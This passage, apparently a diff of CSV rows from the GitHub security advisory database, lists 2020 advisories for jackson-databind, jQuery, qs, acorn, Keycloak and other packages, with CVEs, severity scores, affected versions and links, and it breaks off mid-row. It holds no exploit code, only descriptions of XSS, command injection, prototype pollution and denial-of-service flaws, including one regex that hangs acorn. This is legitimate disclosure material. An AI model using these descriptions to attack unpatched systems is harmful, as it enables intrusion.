+1.4.0,GHSA-758m-v56v-grj4,2021-08-25T20:58:08Z,2020-04-23T21:36:03Z,,['CVE-2020-10969'],jackson-databind mishandles the interaction between serialization gadgets and typing,"FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10969'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2642'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200403-0002/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-23T19:28:10Z', 'nvd_published_at': '2020-03-26T13:15:00Z'}"
+1.4.0,GHSA-4g46-5grc-wq49,2020-08-31T18:59:46Z,2020-04-01T16:36:31Z,,['CVE-2019-15603'],Cross-Site Scripting in seeftl,"All versions of `seeftl` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'seeftl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15603'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/665302'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1451'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-01T16:26:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-426h-24vj-qwxf,2021-07-29T15:52:29Z,2020-04-23T20:09:09Z,,['CVE-2020-7614'],Command Injection in npm-programmatic,"All versions of `npm-programmatic ` are vulnerable to Command Injection. The package fails to sanitize input rules and passes it directly to an `exec` call on the `install`, `uninstall` and `list` functions . This may allow attackers to execute arbitrary code in the system if the package name passed to the function is user-controlled.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'npm-programmatic'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7614'}, {'type': 'WEB', 'url': 'https://github.com/Manak/npm-programmatic/blob/master/index.js#L18'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NPMPROGRAMMATIC-564115'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1507'}]","{'cwe_ids': ['CWE-20', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-04-23T20:02:33Z', 'nvd_published_at': '2020-04-07T14:15:00Z'}"
+1.4.0,GHSA-gxr4-xjj5-5px2,2022-02-08T22:06:37Z,2020-04-29T22:18:55Z,,['CVE-2020-11022'],Potential XSS vulnerability in jQuery,"### Impact
+Passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. `.html()`, `.append()`, and others) may execute untrusted code.
+
+### Patches
+This problem is patched in jQuery 3.5.0.
+
+### Workarounds
+To workaround the issue without upgrading, adding the following to your code:
+
+```js
+jQuery.htmlPrefilter = function( html ) {
+ return html;
+};
+```
+
+You need to use at least jQuery 1.12/2.2 or newer to be able to apply this workaround.
+
+### References
+https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
+https://jquery.com/upgrade-guide/3.5/
+
+### For more information
+If you have any questions or comments about this advisory, search for a relevant issue in [the jQuery repo](https://github.com/jquery/jquery/issues). If you don't find an answer, open a new issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '3.5.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'jquery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '3.5.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-rails'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:jquery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '3.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11022'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77'}, {'type': 'WEB', 'url': 'https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-gxr4-xjj5-5px2'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery/releases/tag/3.5.0'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-11022.yml'}, {'type': 'WEB', 'url': 'https://jquery.com/upgrade-guide/3.5/'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3Cdev.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133@%3Ccommits.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202007-03'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200511-0006/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4693'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2020-002'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1518'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2020-10'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2020-11'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-02'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-10'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-29T22:18:37Z', 'nvd_published_at': '2020-04-29T22:15:00Z'}"
+1.4.0,GHSA-gqgv-6jq5-jjj9,2021-08-25T21:03:56Z,2020-04-30T17:16:47Z,,['CVE-2017-1000048'],Prototype Pollution Protection Bypass in qs,"Affected version of `qs` are vulnerable to Prototype Pollution because it is possible to bypass the protection. The `qs.parse` function fails to properly prevent an object's prototype to be altered when parsing arbitrary input. Input containing `[` or `]` may bypass the prototype pollution protection and alter the Object prototype. This allows attackers to override properties that will exist in all objects, which may lead to Denial of Service or Remote Code Execution in specific circumstances.
+
+
+## Recommendation
+
+Upgrade to 6.0.4, 6.1.2, 6.2.3, 6.3.2 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'qs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'qs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'qs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'qs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3.0'}, {'fixed': '6.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000048'}, {'type': 'WEB', 'url': 'https://github.com/ljharb/qs/issues/200'}, {'type': 'WEB', 'url': 'https://github.com/ljharb/qs/commit/beade029171b8cef9cee0d03ebe577e2dd84976d'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2017:2672'}, {'type': 'PACKAGE', 'url': 'https://github.com/ljharb/qs'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:qs:20170213'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1469'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-30T17:16:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6chw-6frg-f759,2021-08-23T15:10:32Z,2020-04-03T21:48:38Z,,[],Regular Expression Denial of Service in Acorn,"Affected versions of acorn are vulnerable to Regular Expression Denial of Service.
+A regex in the form of /[x-\ud800]/u causes the parser to enter an infinite loop.
+The string is not valid UTF16 which usually results in it being sanitized before reaching the parser.
+If an application processes untrusted input and passes it directly to acorn,
+attackers may leverage the vulnerability leading to Denial of Service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'acorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.5.0'}, {'fixed': '5.7.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'acorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.4.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'acorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/acornjs/acorn/issues/929'}, {'type': 'WEB', 'url': 'https://github.com/acornjs/acorn/commit/793c0e569ed1158672e3a40aeed1d8518832b802'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ACORN-559469'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1488'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-03T21:42:14Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qh4w-7pw3-p4rp,2023-08-25T21:29:46Z,2020-04-29T15:34:50Z,,['CVE-2015-4411'],BSON rubygem contains potential denial of service,The `Moped::BSON::ObjecId.legal?` method in `mongodb/bson-ruby` before 3.0.4 as used in rubygem-moped allows remote attackers to cause a denial of service (worker resource consumption) via a crafted string. NOTE: This issue is due to an incomplete fix to CVE-2015-4410.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'bson'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-4411'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/bson-ruby/commit/976da329ff03ecdfca3030eb6efe3c85e6db9999'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/bson-ruby/commit/fef6f75413511d653c76bf924a932374a183a24f#diff-8c8558c185bbb548ccb5a6d6ac4bfee5R191'}, {'type': 'WEB', 'url': 'https://github.com/mongoid/moped/commit/dd5a7c14b5d2e466f7875d079af71ad19774609b#diff-3b93602f64c2fe46d38efd9f73ef5358R24'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1229706'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-qh4w-7pw3-p4rp'}, {'type': 'PACKAGE', 'url': 'https://github.com/mongodb/bson-ruby'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/bson-ruby/compare/7446d7c6764dfda8dc4480ce16d5c023e74be5ca...28f34978a85b689a4480b4d343389bf4886522e7'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bson/CVE-2015-4411.yml'}, {'type': 'WEB', 'url': 'https://homakov.blogspot.ru/2012/05/saferweb-injects-in-various-ruby.html'}, {'type': 'WEB', 'url': 'https://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html'}, {'type': 'WEB', 'url': 'https://seclists.org/oss-sec/2015/q2/653'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2015-4411'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20200228085849/http://www.securityfocus.com/bid/75045'}, {'type': 'WEB', 'url': 'http://lists.fedoraproject.org/pipermail/package-announce/2015-July/161964.html'}, {'type': 'WEB', 'url': 'http://lists.fedoraproject.org/pipermail/package-announce/2015-July/161987.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2015/06/06/3'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-23T20:14:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c2h6-7gm8-cv4w,2023-01-24T18:07:52Z,2020-04-01T16:35:44Z,,['CVE-2020-5497'],XSS in MITREid Connect,The OpenID Connect reference implementation for MITREid Connect through 1.3.3 allows XSS due to userInfoJson being included in the page unsanitized. This is related to header.tag. The issue can be exploited to execute arbitrary JavaScript.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.mitre:openid-connect-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5497'}, {'type': 'WEB', 'url': 'https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521'}, {'type': 'WEB', 'url': 'https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/pull/1526'}, {'type': 'WEB', 'url': 'https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/pull/1527'}, {'type': 'WEB', 'url': 'https://www.securitymetrics.com/blog/MITREid-Connect-cross-site-scripting-CVE-2020-5497'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/156574/MITREid-1.3.3-Cross-Site-Scripting.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2020/Feb/25'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-01T16:02:47Z', 'nvd_published_at': '2020-01-04T03:15:00Z'}"
+1.4.0,GHSA-vcjj-xf2r-mwvc,2022-04-25T23:07:31Z,2020-04-01T15:47:45Z,,['CVE-2019-14862'],XSS in knockout,"There is a vulnerability in knockout before version 3.5.0-beta, where after escaping the context of the web application, the web application delivers data to its users along with other trusted dynamic content, without validating it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'knockout'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14862'}, {'type': 'WEB', 'url': 'https://github.com/knockout/knockout/issues/1244'}, {'type': 'WEB', 'url': 'https://github.com/knockout/knockout/pull/2345'}, {'type': 'WEB', 'url': 'https://github.com/knockout/knockout/commit/7e280b2b8a04cc19176b5171263a5c68bda98efb'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14862'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:knockout:20180213'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/WS-2019-0015'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-01T15:46:54Z', 'nvd_published_at': '2020-01-02T15:15:00Z'}"
+1.4.0,GHSA-wvpv-ffcv-r6cw,2021-01-08T20:22:38Z,2020-04-14T23:09:13Z,,['CVE-2020-11005'],Internal NCryptDecrypt method could be used externally from WindowsHello library.,"### Impact
+Every user of the library before version 1.0.4.
+
+### Patches
+Patched in 1.0.4+.
+
+### Workarounds
+None.
+
+### References
+https://github.com/SeppPenner/WindowsHello/issues/3
+
+### For more information
+It this library is used to encrypt text and write the output to a txt file, another executable could be able to decrypt the text using the static method NCryptDecrypt from this same library without the need to use Windows Hello Authentication again.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'HaemmerElectronics.SeppPenner.WindowsHello'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/SeppPenner/WindowsHello/security/advisories/GHSA-wvpv-ffcv-r6cw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11005'}, {'type': 'WEB', 'url': 'https://github.com/SeppPenner/WindowsHello/issues/3'}]","{'cwe_ids': ['CWE-288'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-14T22:26:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8vf3-4w62-m3pq,2021-08-23T15:16:25Z,2020-04-15T21:09:09Z,,['CVE-2020-1697'],XSS in Keycloak,"It was found in all keycloak versions before 9.0.0 that links to external applications (Application Links) in the admin console are not validated properly and could allow Stored XSS attacks. An authed malicious user could create URLs to trick users in other realms, and possibly conduct further attacks.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1697'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1697'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-15T20:56:17Z', 'nvd_published_at': '2020-02-10T15:15:00Z'}"
+1.4.0,GHSA-xfqh-7356-vqjj,2021-11-01T14:08:16Z,2020-04-15T21:08:21Z,,['CVE-2019-14820'],Exposure of Sensitive Information to an Unauthorized Actor in Keycloak,"It was found that keycloak before version 8.0.0 exposes internal adapter endpoints in org.keycloak.constants.AdapterConstants, which can be invoked via a specially-crafted URL. This vulnerability could allow an attacker to access unauthorized information.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14820'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14820'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-15T20:54:33Z', 'nvd_published_at': '2020-01-08T15:15:00Z'}"
+1.4.0,GHSA-gvr4-7xgc-gx3w,2020-08-31T18:59:48Z,2020-04-01T16:36:15Z,,['CVE-2019-15602'],Cross-Site Scripting in fileview,"All versions of `fileview` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'fileview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15602'}, {'type': 'WEB', 'url': 'https://github.com/itworkcenter/fileview/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/itworkcenter/fileview/pull/2'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/507159'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1452'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-01T16:21:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j438-45hc-vjhm,2021-01-08T20:59:34Z,2020-04-16T03:14:39Z,,['CVE-2020-11003'],CSRF and DNS Rebinding in Oasis,"### Impact
+_What kind of vulnerability is it? Who is impacted?_
+
+If you're running a vulnerable application on your computer and an attacker can trick you into visiting a malicious website, they could use [DNS rebinding](https://en.wikipedia.org/wiki/DNS_rebinding) and [CSRF](https://en.wikipedia.org/wiki/Cross-site_request_forgery) attacks to read/write to vulnerable applications.
+
+**There is no evidence that suggests that this has been used in the wild.**
+
+### Patches
+_Has the problem been patched? What versions should users upgrade to?_
+
+Yes, 2.15.0.
+
+### Workarounds
+_Is there a way for users to fix or remediate the vulnerability without upgrading?_
+
+No.
+
+### References
+_Are there any links users can visit to find out more?_
+
+No.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [fraction/oasis](http://github.com/fraction/oasis)
+* Email me at [christianbundy@fraction.io](mailto:christianbundy@fraction.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@fraction/oasis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.15.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fraction/oasis/security/advisories/GHSA-j438-45hc-vjhm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11003'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-15T22:57:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rc5r-697f-28x6,2021-08-23T15:13:38Z,2020-04-15T21:07:59Z,,['CVE-2019-12186'],XSS injection in the Grid component of Sylius,Grid component of Sylius omits HTML input sanitisation while rendering object implementing __toString() method through the string field type.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sylius/grid'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.1.19'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/grid'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/grid'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': 